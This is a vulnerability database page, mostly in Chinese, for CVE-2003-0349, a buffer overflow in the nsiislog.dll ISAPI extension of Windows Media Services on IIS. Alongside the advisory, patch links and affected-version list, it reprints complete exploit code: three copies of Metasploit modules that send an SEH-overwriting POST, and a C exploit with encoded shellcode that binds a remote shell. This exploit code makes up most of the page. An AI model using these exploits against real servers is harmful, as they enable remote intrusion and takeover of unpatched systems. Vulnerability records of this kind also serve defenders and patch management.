CVE-2003-0349
CVSS7.5
发布时间 :2003-07-24 00:00:00
修订时间 :2016-10-17 22:32:54
NMCOEPS    

[原文]Buffer overflow in the streaming media component for logging multicast requests in the ISAPI for the logging capability of Microsoft Windows Media Services (nsiislog.dll), as installed in IIS 5.0, allows remote attackers to execute arbitrary code via a large POST request to nsiislog.dll.


[CNNVD]Windows Media服务NSIISlog.DLL超长头结构远程缓冲区溢出漏洞(MS03-022)(CNNVD-200307-025)

        
        Microsoft Windows媒体服务(Media Services)是Microsoft Windows 2000 Server、Advanced Server和Datacenter Server包含的服务,支持通过多播流从网络上传送媒体内容给客户端。
        Microsoft Windows媒体服务的ISAPI扩展实现对用户请求处理存在缓冲区溢出漏洞,远程攻击者可以利用这个漏洞对服务进行拒绝服务攻击或执行任意指令。
        在多播流中,为了能记录客户端信息,Windows 2000提供了多拨和单播传输进行记录的功能。此功能以ISAPI扩展实现 - nsiislog.dll,当Windows媒体服务安装在Windows NT 4.0服务器上或在Windows 2000中通过增加/删除程序进行安装时,nsiislog.dll就会安装在IIS脚本目录下。Windows 2000下安装的nsiislog.dll处理超长POST请求数据时存在缓冲区溢出漏洞,这可导致攻击者发送畸形请求给服务器,使IIS停止对Internet请求的响应或执行任意指令。
        Windows媒体服务默认没有安装在Windows 2000上。
        注:此漏洞与MS03-019中描述的不是同一个漏洞。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:938IIS5.0 Windows Media Services Large POST Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0349
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0349
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200307-025
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=105665030925504&w=2
(UNKNOWN)  BUGTRAQ  20030626 Windows Media Services Remote Command Execution #2
http://securitytracker.com/id?1007059
(UNKNOWN)  SECTRACK  1007059
http://www.kb.cert.org/vuls/id/113716
(UNKNOWN)  CERT-VN  VU#113716
http://www.microsoft.com/technet/security/bulletin/ms03-022.asp
(VENDOR_ADVISORY)  MS  MS03-022
http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0306&L=NTBUGTRAQ&P=R4563
(VENDOR_ADVISORY)  NTBUGTRAQ  20030626 Windows Media Services Remote Command Execution #2

- 漏洞信息

Windows Media服务NSIISlog.DLL超长头结构远程缓冲区溢出漏洞(MS03-022)
高危 边界条件错误
2003-07-24 00:00:00 2005-10-20 00:00:00
远程※本地  
        
        Microsoft Windows媒体服务(Media Services)是Microsoft Windows 2000 Server、Advanced Server和Datacenter Server包含的服务,支持通过多播流从网络上传送媒体内容给客户端。
        Microsoft Windows媒体服务的ISAPI扩展实现对用户请求处理存在缓冲区溢出漏洞,远程攻击者可以利用这个漏洞对服务进行拒绝服务攻击或执行任意指令。
        在多播流中,为了能记录客户端信息,Windows 2000提供了多拨和单播传输进行记录的功能。此功能以ISAPI扩展实现 - nsiislog.dll,当Windows媒体服务安装在Windows NT 4.0服务器上或在Windows 2000中通过增加/删除程序进行安装时,nsiislog.dll就会安装在IIS脚本目录下。Windows 2000下安装的nsiislog.dll处理超长POST请求数据时存在缓冲区溢出漏洞,这可导致攻击者发送畸形请求给服务器,使IIS停止对Internet请求的响应或执行任意指令。
        Windows媒体服务默认没有安装在Windows 2000上。
        注:此漏洞与MS03-019中描述的不是同一个漏洞。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时删除或者禁用nsiislog.dll,这不会影响媒体服务的正常工作。
        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS03-022)以及相应补丁:
        MS03-022:Flaw in ISAPI Extension for Windows Media Services Could Cause Code Execution (Q822343)
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS03-022.asp

        补丁下载:
        Microsoft Windows 2000:
        
        http://microsoft.com/downloads/details.aspx?FamilyId=F772E131-BBC9-4B34-9E78-F71D9742FED8&displaylang=en

- 漏洞信息 (16355)

Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow (EDBID:16355)
windows remote
2010-07-25 Verified
0 metasploit
N/A [点击下载]
##
# $Id: ms03_022_nsiislog_post.rb 9929 2010-07-25 21:37:54Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::BruteTargets
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow',
			'Description'    => %q{
					This exploits a buffer overflow found in the nsiislog.dll
				ISAPI filter that comes with Windows Media Server. This
				module will also work against the 'patched' MS03-019
				version. This vulnerability was addressed by MS03-022.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9929 $',
			'References'     =>
				[
					[ 'CVE', '2003-0349'],
					[ 'OSVDB', '4535'],
					[ 'BID', '8035'],
					[ 'MSB', 'MS03-022'],
					[ 'URL', 'http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
					'StackAdjustment' => -3500,

				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# SEH offsets by version (Windows 2000)
					# 4.1.0.3917 =  9992
					# 4.1.0.3920 =  9992
					# 4.1.0.3927 =  9992
					# 4.1.0.3931 = 14092

					['Brute Force',            { }],
					['Windows 2000 -MS03-019', { 'Rets' => [  9988, 0x40f01333 ] }],
					['Windows 2000 +MS03-019', { 'Rets' => [ 14088, 0x40f01353 ] }],
					['Windows XP   -MS03-019', { 'Rets' => [  9992, 0x40f011e0 ] }],
				],
			'DisclosureDate' => 'Jun 25 2003',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('URL', [ true,  "The path to nsiislog.dll", "/scripts/nsiislog.dll" ]),
			], self.class)
	end

	def check
		res = send_request_raw({
			'uri' => datastore['URL']
		}, -1)

		if (res and res.body =~ /NetShow ISAPI/)
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe
	end

	def exploit_target(target)

		# Create a buffer greater than max SEH offset (16384)
		pst = rand_text_alphanumeric(256) * 64

		# Create SEH frame and insert into buffer
		seh = generate_seh_payload(target['Rets'][1])
		pst[target['Rets'][0], seh.length] = seh

		# Send it to the server
		print_status("Sending request...")
		res = send_request_cgi({
			'uri'          => datastore['URL'],
			'method'       => 'POST',
			'user-agent'   => 'NSPlayer/2.0',
			'content-type' => 'application/x-www-form-urlencoded',
			'data'         => pst
		}, 5)

		select(nil,nil,nil,1)

		handler
		disconnect
	end

end
		

- 漏洞信息 (22837)

Microsoft Windows 2000/NT 4 Media Services NSIISlog.DLL Remote Buffer Overflow (EDBID:22837)
windows remote
2003-06-25 Verified
0 firew0rker
N/A [点击下载]
source: http://www.securityfocus.com/bid/8035/info

Microsoft has reported a buffer overflow vulnerability in Windows Media Services. This is due to a problem with how the logging ISAPI extension handles incoming client requests. This could cause arbitrary code execution in IIS, which is exploitable through Media Services.

// Windows Media Services Remote Command Execution #2 
// v. 1.0 beta 
// (c) firew0rker  //tN  [The N0b0D1eS] 

#include <stdio.h> 
#include <string.h> 
#include <stdlib.h> 

#ifdef WIN32 
#include <winsock.h> 
#pragma comment(lib, "wsock32") 
#else 
#include <sys/socket.h> 
#include <sys/types.h> 
#include <netinet/in.h> 
#include <arpa/inet.h> 
#include <netdb.h> 
#include <unistd.h> 
#define SOCKET int 
#define DWORD uint32_t 
#define ULONG unsigned long 
#define INVALID_SOCKET -1 
#define SOCKET_ERROR -1 
#define closesocket close 
#endif 

char shellcode[]= 
//"\x90\x90\x90\x90\x90\x90\x90\xCC" //¤«ï⤪¨ 
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff" 
"\xff\x5b\x81\xeb\x4d\x43\x22\x11" 
"\x8b\xc3\x05\x66\x43\x22\x11\x66" 
"\xb9\x15\x03\x80\x30\xfb\x40\x67" 
"\xe2\xf9\x33\xa3\xf9\xfb\x72\x66" 
"\x53\x06\x04\x04\x76\x66\x37\x06" 
"\x04\x04\xa8\x40\xf6\xbd\xd9\xea" 
"\xf8\x66\x53\x06\x04\x04\xa8\x93" 
"\xfb\xfb\x04\x04\x13\x91\xfa\xfb" 
"\xfb\x43\xcd\xbd\xd9\xea\xf8\x7e" 
"\x53\x06\x04\x04\xab\x04\x6e\x37" 
"\x06\x04\x04\xf0\x3b\xf4\x7f\xbe" 
"\xfa\xfb\xfb\x76\x66\x3b\x06\x04" 
"\x04\xa8\x40\xba\xbd\xd9\xea\xf8" 
"\x66\x53\x06\x04\x04\xa8\xab\x13" 
"\xcc\xfa\xfb\xfb\x76\x7e\x8f\x05" 
"\x04\x04\xab\x93\xfa\xfa\xfb\xfb" 
"\x04\x6e\x4b\x06\x04\x04\xc8\x20" 
"\xa8\xa8\xa8\x91\xfd\x91\xfa\x91" 
"\xf9\x04\x6e\x3b\x06\x04\x04\x72" 
"\x7e\xa7\x05\x04\x04\x9d\x3c\x7e" 
"\x9f\x05\x04\x04\xf9\xfb\x9d\x3c" 
"\x7e\x9d\x05\x04\x04\x73\xfb\x3c" 
"\x7e\x93\x05\x04\x04\xfb\xfb\xfb" 
"\xfb\x76\x66\x9f\x05\x04\x04\x91" 
"\xeb\xa8\x04\x4e\xa7\x05\x04\x04" 
"\x04\x6e\x47\x06\x04\x04\xf0\x3b" 
"\x8f\xe8\x76\x6e\x9c\x05\x04\x04" 
"\x05\xf9\x7b\xc1\xfb\xf4\x7f\x46" 
"\xfb\xfb\xfb\x10\x2f\x91\xfa\x04" 
"\x4e\xa7\x05\x04\x04\x04\x6e\x43" 
"\x06\x04\x04\xf0\x3b\xf4\x7e\x5e" 
"\xfb\xfb\xfb\x3c\x7e\x9b\x05\x04" 
"\x04\xeb\xfb\xfb\xfb\x76\x7e\x9b" 
"\x05\x04\x04\xab\x76\x7e\x9f\x05" 
"\x04\x04\xab\x04\x4e\xa7\x05\x04" 
"\x04\x04\x6e\x4f\x06\x04\x04\x72" 
"\x7e\xa3\x05\x04\x04\x07\x76\x46" 
"\xf3\x05\x04\x04\xc8\x3b\x42\xbf" 
"\xfb\xfb\xfb\x08\x51\x3c\x7e\xcf" 
"\x05\x04\x04\xfb\xfa\xfb\xfb\x70" 
"\x7e\xa3\x05\x04\x04\x72\x7e\xbf" 
"\x05\x04\x04\x72\x7e\xb3\x05\x04" 
"\x04\x72\x7e\xbb\x05\x04\x04\x3c" 
"\x7e\xf3\x05\x04\x04\xbf\xfb\xfb" 
"\xfb\xc8\x20\x76\x7e\x03\x06\x04" 
"\x04\xab\x76\x7e\xf3\x05\x04\x04" 
"\xab\xa8\xa8\x93\xfb\xfb\xfb\xf3" 
"\x91\xfa\xa8\xa8\x43\x8c\xbd\xd9" 
"\xea\xf8\x7e\x53\x06\x04\x04\xab" 
"\xa8\x04\x6e\x3f\x06\x04\x04\x04" 
"\x4e\xa3\x05\x04\x04\x04\x6e\x57" 
"\x06\x04\x04\x12\xa0\x04\x04\x04" 
"\x04\x6e\x33\x06\x04\x04\x13\x76" 
"\xfa\xfb\xfb\x33\xef\xfb\xfb\xac" 
"\xad\x13\xfb\xfb\xfb\xfb\x7a\xd7" 
"\xdf\xf9\xbe\xd9\xea\x43\x0e\xbe" 
"\xd9\xea\xf8\xff\xdf\x78\x3f\xff" 
"\xab\x9f\x9c\x04\xcd\xfb\xfb\x72" 
"\x9e\x03\x13\xfb\xfb\xfb\xfb\x7a" 
"\xd7\xdf\xd8\xbe\xd9\xea\x43\xac" 
"\xbe\xd9\xea\xf8\xff\xdf\x78\x3f" 
"\xff\x72\xbe\x07\x9f\x9c\x72\xdd" 
"\xfb\xfb\x70\x86\xf3\x9d\x7a\xc4" 
"\xb6\xa1\x8e\xf4\x70\x0c\xf8\x8d" 
"\xc7\x7a\xc5\xab\xbe\xfb\xfb\x8e" 
"\xf9\x10\xf3\x7a\x14\xfb\xfb\xfa" 
"\xfb\x10\x19\x72\x86\x0b\x72\x8e" 
"\x17\x70\x86\xf7\x42\x6d\xfb\xfb" 
"\xfb\xc9\x3b\x09\x55\x72\x86\x0f" 
"\x70\x34\xd0\xb6\xf7\x70\xad\x83" 
"\xf8\xae\x0b\x70\xa1\xdb\xf8\xa6" 
"\x0b\xc8\x3b\x70\xc0\xf8\x86\x0b" 
"\x70\x8e\xf7\xaa\x08\x5d\x8e\xfe" 
"\x78\x3f\xff\x10\xf1\xa2\x78\x38" 
"\xff\xbb\xc0\xb9\xe3\x8e\x1f\xc0" 
"\xb9\xe3\x8e\xf9\x10\xb8\x70\x89" 
"\xdf\xf8\x8e\x0b\x2a\x1b\xf8\x3d" 
"\xf4\x4c\xfb\x70\x81\xe7\x3a\x1b" 
"\xf9\xf8\xbe\x0b\xf8\x3c\x70\xfb" 
"\xf8\xbe\x0b\x70\xb6\x0f\x72\xb6" 
"\xf7\x70\xa6\xeb\x72\xf8\x78\x96" 
"\xeb\xff\x70\x8e\x17\x7b\xc2\xfb" 
"\x8e\x7c\x9f\x9c\x74\xfd\xfb\xfb" 
"\x78\x3f\xff\xa5\xa4\x32\x39\xf7" 
"\xfb\x70\x86\x0b\x12\x99\x04\x04" 
"\x04\x33\xfb\xfb\xfb\x70\xbe\xeb" 
"\x7a\x53\x67\xfb\xfb\xfb\xfb\xfb" 
"\xfa\xfb\x43\xfb\xfb\xfb\xfb\x32" 
"\x38\xb7\x94\x9a\x9f\xb7\x92\x99" 
"\x89\x9a\x89\x82\xba\xfb\xbe\x83" 
"\x92\x8f\xab\x89\x94\x98\x9e\x88" 
"\x88\xfb\xb8\x89\x9e\x9a\x8f\x9e" 
"\xab\x89\x94\x98\x9e\x88\x88\xba" 
"\xfb\xfb\xac\xa8\xc9\xa4\xc8\xc9" 
"\xd5\xbf\xb7\xb7\xfb\xac\xa8\xba" 
"\xa8\x94\x98\x90\x9e\x8f\xba\xfb" 
"\x99\x92\x95\x9f\xfb\x97\x92\x88" 
"\x8f\x9e\x95\xfb\x9a\x98\x98\x9e" 
"\x8b\x8f\xfb\xac\xa8\xba\xa8\x8f" 
"\x9a\x89\x8f\x8e\x8b\xfb\x98\x97" 
"\x94\x88\x9e\x88\x94\x98\x90\x9e" 
"\x8f\xfb\xfb\x98\x96\x9f\xfb\xe9" 
"\xc4\xfc\xff\xff\x74\xf9\x75\xf7"; 


const DWORD default_EIP_pos = 9992; //¯®«®¦¥­¨¥ EIP ¢ ¡ãà(sploit) 
const DWORD default_EBX_points_to = 9988; //㧠⥫ì EBX ®⭮ᥫ쭮 sploit 
//const DWORD default_EIP_value = 0x77F8441B; //¯® í¬ã¤à¤.¡. JMP EDX, ¢ ¤ ­­®¬ áç í ¢ ntdll.dll 
const DWORD default_EIP_value = 0x40F01333; 
//const default_EDX_points_to = 0x1000; //í ­¥ ¯ਣ®¤¨«®á
char *nsiislog_default = "/scripts/nsiislog.dll"; 
char sploit[default_EIP_pos+4+sizeof(shellcode)+1]; 
char sploitbuf[sizeof(sploit)*2]; 

void usage(char* argv[]) 
{ 
       printf("Dicklamer (: " 
   "We are not responsible for the illegal use of this software.\n" 
   "Description: Binds shell to port 34816 (or higher if port busy).\n" 
   "Usage:   " 
   "%s target [-p target_port] [-r /renamed_scripts/renamed_nsiislog.dll]\n" 
   "Supported target(s):\n" 
   "Windows version\t\t\t\tnsiislog.dll version\n" 
   "------------------------------------------------------------\n" 
   "2000 [5.00.2195] server rus.\t\t4.1.0.3917\n", argv[0]); 
       exit(0); 
} 

int main(int argc, char* argv[]) 
{ 
#ifdef WIN32 
   WSADATA wsaData;        
#endif 
   int target_port = 80; 
   char *nsiislog = nsiislog_default; 
   int      nArgIndex; 

   if (argc<2) usage(argv); 
   nArgIndex = 1; 
   while ((nArgIndex < argc)&&(strlen(argv[nArgIndex])>=2)&&(argv[nArgIndex][0]=='-')) 
   { 
      switch (argv[nArgIndex++][1]) 
      { 
      case 'p': 
      case 'P': 
         target_port = atoi(argv[nArgIndex++]); 
         continue; 
      case 'r': 
      case 'R': 
         nsiislog = argv[nArgIndex++]; 
         continue; 
      default: 
         usage(argv); 
      } 
   } 
    
   try { 
#ifdef WIN32 
      WSAStartup(0x0101, &wsaData); 
#endif 
      SOCKET s = socket(AF_INET,SOCK_STREAM,0); 
      if (s == INVALID_SOCKET) throw("No socket"); 
      sockaddr_in addr; 
       
      //.¯।¥«塞  ¤à ᢠª 
      ULONG iaddr = inet_addr(argv[1]); 
      if (iaddr == INADDR_NONE) {//.¤à - ¨¬ï¥àª 
         hostent *ph = gethostbyname(argv[1]); 
         if (!ph) throw("Cant resolve hostname"); 
         memcpy(&addr.sin_addr.s_addr,ph->h_addr_list[0],sizeof(in_addr)); 
      } else {//.¤à - IP 
         memcpy(&addr.sin_addr.s_addr,&iaddr,4); 
      }; 
       
      addr.sin_family = AF_INET; 
      addr.sin_port   = htons(target_port); 
      int sizeofaddr=sizeof(addr); 

char *req = "MX_STATS_LogLine: "; 
strcpy(sploit, req); 
memset(sploit+strlen(sploit), 0xCC, default_EIP_pos-strlen(req)); 
//memcpy(sploit+default_EDX_points_to, shellcode, sizeof(shellcode)-1/*ã â\0*/); 
memcpy(sploit+default_EBX_points_to-(sizeof(shellcode)-1)+4, shellcode, sizeof(shellcode)-1/*ã â\0*/); 
//¯à¯¥à®¤¥ ­  EIP, EBX ¡㤥⪠§ëâ­  ¯®᫥¤­¨© DWORD ­ 襣® § ¯à , £¤¥ JZ/JNZ 
memcpy(sploit+default_EIP_pos, &default_EIP_value, sizeof default_EIP_value); 
       
      /*strcpy(sploit+sizeof(sploit)-11,"BCDEFGHIJK");*/ 
      sploit[sizeof(sploit)-1] = 0; 
       
  if (connect(s,(struct sockaddr*)&addr,sizeof(struct sockaddr)) == SOCKET_ERROR) throw("Cant connect host"); 

      sprintf(sploitbuf, 
         "POST %s HTTP/1.0\r\n" 
         "Accept: */*\r\n" 
         "User-Agent: NSPlayer/4.1.0.3917\r\n" 
         "Content-Type: text/plain\r\n" 
         "Content-Length: %i\r\n" 
         "Pragma: xClientGUID={89f451e0-a491-4346-ad78-4d55aac89045}\r\n" 
         "\r\n%s\r\n", 
         nsiislog,strlen(sploit),sploit); 
       
      int snd=send(s,sploitbuf,strlen(sploitbuf),0); 
      if (snd == strlen(sploitbuf)) printf("Target exploited.\n"); 
         else throw("Cant send exploit"); 
      closesocket(s); 
   } 
   catch (char *errmsg) 
   { 
       
      printf("%s\n",errmsg); 
      return -1; 
   } 
   catch (int err_n) 
   { 
      printf("error %i\n",err_n); 
      return err_n; 
   } 
#ifdef WIN32 
    WSACleanup(); 
#endif 
   return 0; 
} 
		

- 漏洞信息 (F92137)

Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow (PacketStormID:F92137)
2010-07-26 00:00:00
H D Moore  metasploit.com
exploit,overflow
windows
CVE-2003-0349
[点击下载]

This exploits a buffer overflow found in the nsiislog.dll ISAPI filter that comes with Windows Media Server. This Metasploit module will also work against the 'patched' MS03-019 version. This vulnerability was addressed by MS03-022.

##
# $Id: ms03_022_nsiislog_post.rb 9929 2010-07-25 21:37:54Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::BruteTargets
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow',
			'Description'    => %q{
					This exploits a buffer overflow found in the nsiislog.dll
				ISAPI filter that comes with Windows Media Server. This
				module will also work against the 'patched' MS03-019
				version. This vulnerability was addressed by MS03-022.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9929 $',
			'References'     =>
				[
					[ 'CVE', '2003-0349'],
					[ 'OSVDB', '4535'],
					[ 'BID', '8035'],
					[ 'MSB', 'MS03-022'],
					[ 'URL', 'http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
					'StackAdjustment' => -3500,

				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# SEH offsets by version (Windows 2000)
					# 4.1.0.3917 =  9992
					# 4.1.0.3920 =  9992
					# 4.1.0.3927 =  9992
					# 4.1.0.3931 = 14092

					['Brute Force',            { }],
					['Windows 2000 -MS03-019', { 'Rets' => [  9988, 0x40f01333 ] }],
					['Windows 2000 +MS03-019', { 'Rets' => [ 14088, 0x40f01353 ] }],
					['Windows XP   -MS03-019', { 'Rets' => [  9992, 0x40f011e0 ] }],
				],
			'DisclosureDate' => 'Jun 25 2003',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('URL', [ true,  "The path to nsiislog.dll", "/scripts/nsiislog.dll" ]),
			], self.class)
	end

	def check
		res = send_request_raw({
			'uri' => datastore['URL']
		}, -1)

		if (res and res.body =~ /NetShow ISAPI/)
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe
	end

	def exploit_target(target)

		# Create a buffer greater than max SEH offset (16384)
		pst = rand_text_alphanumeric(256) * 64

		# Create SEH frame and insert into buffer
		seh = generate_seh_payload(target['Rets'][1])
		pst[target['Rets'][0], seh.length] = seh

		# Send it to the server
		print_status("Sending request...")
		res = send_request_cgi({
			'uri'          => datastore['URL'],
			'method'       => 'POST',
			'user-agent'   => 'NSPlayer/2.0',
			'content-type' => 'application/x-www-form-urlencoded',
			'data'         => pst
		}, 5)

		select(nil,nil,nil,1)

		handler
		disconnect
	end

end
    

- 漏洞信息 (F83155)

Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow (PacketStormID:F83155)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,overflow
windows
CVE-2003-0349
[点击下载]

This exploits a buffer overflow found in the nsiislog.dll ISAPI filter that comes with Windows Media Server. This Metasploit module will also work against the 'patched' MS03-019 version. This vulnerability was addressed by MS03-022.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote


	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::BruteTargets
	include Msf::Exploit::Remote::Seh
	
	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow',
			'Description'    => %q{
				This exploits a buffer overflow found in the nsiislog.dll
				ISAPI filter that comes with Windows Media Server. This
				module will also work against the 'patched' MS03-019
				version. This vulnerability was addressed by MS03-022.
					
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2003-0349'],
					[ 'OSVDB', '4535'],
					[ 'BID', '8035'],
					[ 'MSB', 'MS03-022'],
					[ 'URL', 'http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html'],

				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
					'StackAdjustment' => -3500,

				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					# SEH offsets by version (Windows 2000)
					# 4.1.0.3917 =  9992
					# 4.1.0.3920 =  9992
					# 4.1.0.3927 =  9992		
					# 4.1.0.3931 = 14092
									
					['Brute Force',            { }],
					['Windows 2000 -MS03-019', { 'Rets' => [  9988, 0x40f01333 ] }],
					['Windows 2000 +MS03-019', { 'Rets' => [ 14088, 0x40f01353 ] }],
					['Windows XP   -MS03-019', { 'Rets' => [  9992, 0x40f011e0 ] }],
				],
			'DisclosureDate' => 'Jun 25 2003',
			'DefaultTarget'  => 0))
			
			register_options(
				[
					OptString.new('URL', [ true,  "The path to nsiislog.dll", "/scripts/nsiislog.dll" ]),
				], self.class)			
	end
	
	def check
		res = send_request_raw({
			'uri' => datastore['URL']
		}, -1)
		
		if (res and res.body =~ /NetShow ISAPI/)
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe
	end
	
	def exploit_target(target)

		# Create a buffer greater than max SEH offset (16384)
		pst = rand_text_alphanumeric(256) * 64

		# Create SEH frame and insert into buffer
		seh = generate_seh_payload(target['Rets'][1])
		pst[target['Rets'][0], seh.length] = seh

		# Send it to the server
		print_status("Sending request...")
		res = send_request_cgi({
			'uri'          => datastore['URL'],
			'method'       => 'POST',
			'user-agent'   => 'NSPlayer/2.0',
			'content-type' => 'application/x-www-form-urlencoded',
			'data'         => pst
		}, 5)

		sleep(1)
		
		handler
		disconnect
	end

end
    

- 漏洞信息

4535
Microsoft Media Services ISAPI nsiislog.dll POST Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- 漏洞描述

Windows Media Services contains a flaw that may allow a remote attacker to execute arbitrary code. The issue is due to a flaw in the ISAPI (Internet Services Application Programming Interface) extension handling of incoming client requests in the nsiislog.dll file of the Internet Information Services (IIS). With a specially crafted POST request, an attacker may create a denial of service or exexcute arbitrary code.

- 时间线

2003-06-25 2003-05-28
2003-06-25 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft Windows Media Services NSIISlog.DLL Remote Buffer Overflow Vulnerability
Boundary Condition Error 8035
Yes Yes
2003-06-25 12:00:00 2009-07-11 10:56:00
Discovery of this vulnerability has been credited to Brett Moore.

- 受影响的程序版本

Microsoft Windows NT 4.0 SP6a
+ Microsoft Windows NT Enterprise Server 4.0 SP6a
+ Microsoft Windows NT Enterprise Server 4.0 SP6a
+ Microsoft Windows NT Server 4.0 SP6a
+ Microsoft Windows NT Server 4.0 SP6a
+ Microsoft Windows NT Terminal Server 4.0 SP6a
+ Microsoft Windows NT Workstation 4.0 SP6a
+ Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT 4.0 SP6
+ Microsoft Windows NT Enterprise Server 4.0 SP6
+ Microsoft Windows NT Enterprise Server 4.0 SP6
+ Microsoft Windows NT Server 4.0 SP6
+ Microsoft Windows NT Server 4.0 SP6
+ Microsoft Windows NT Terminal Server 4.0 SP6
+ Microsoft Windows NT Terminal Server 4.0 SP6
+ Microsoft Windows NT Workstation 4.0 SP6
+ Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT 4.0 SP5
+ Microsoft Windows NT Enterprise Server 4.0 SP5
+ Microsoft Windows NT Enterprise Server 4.0 SP5
+ Microsoft Windows NT Server 4.0 SP5
+ Microsoft Windows NT Server 4.0 SP5
+ Microsoft Windows NT Terminal Server 4.0 SP5
+ Microsoft Windows NT Terminal Server 4.0 SP5
+ Microsoft Windows NT Workstation 4.0 SP5
+ Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT 4.0 SP4
+ Microsoft Windows NT Enterprise Server 4.0 SP4
+ Microsoft Windows NT Enterprise Server 4.0 SP4
+ Microsoft Windows NT Server 4.0 SP4
+ Microsoft Windows NT Server 4.0 SP4
+ Microsoft Windows NT Terminal Server 4.0 SP4
+ Microsoft Windows NT Terminal Server 4.0 SP4
+ Microsoft Windows NT Workstation 4.0 SP4
+ Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT 4.0 SP3
+ Microsoft Windows NT Enterprise Server 4.0 SP3
+ Microsoft Windows NT Enterprise Server 4.0 SP3
+ Microsoft Windows NT Server 4.0 SP3
+ Microsoft Windows NT Server 4.0 SP3
+ Microsoft Windows NT Terminal Server 4.0 SP3
+ Microsoft Windows NT Terminal Server 4.0 SP3
+ Microsoft Windows NT Workstation 4.0 SP3
+ Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT 4.0 SP2
+ Microsoft Windows NT Enterprise Server 4.0 SP2
+ Microsoft Windows NT Enterprise Server 4.0 SP2
+ Microsoft Windows NT Server 4.0 SP2
+ Microsoft Windows NT Server 4.0 SP2
+ Microsoft Windows NT Terminal Server 4.0 SP2
+ Microsoft Windows NT Terminal Server 4.0 SP2
+ Microsoft Windows NT Workstation 4.0 SP2
+ Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT 4.0 SP1
+ Microsoft Windows NT Enterprise Server 4.0 SP1
+ Microsoft Windows NT Enterprise Server 4.0 SP1
+ Microsoft Windows NT Server 4.0 SP1
+ Microsoft Windows NT Server 4.0 SP1
+ Microsoft Windows NT Terminal Server 4.0 SP1
+ Microsoft Windows NT Terminal Server 4.0 SP1
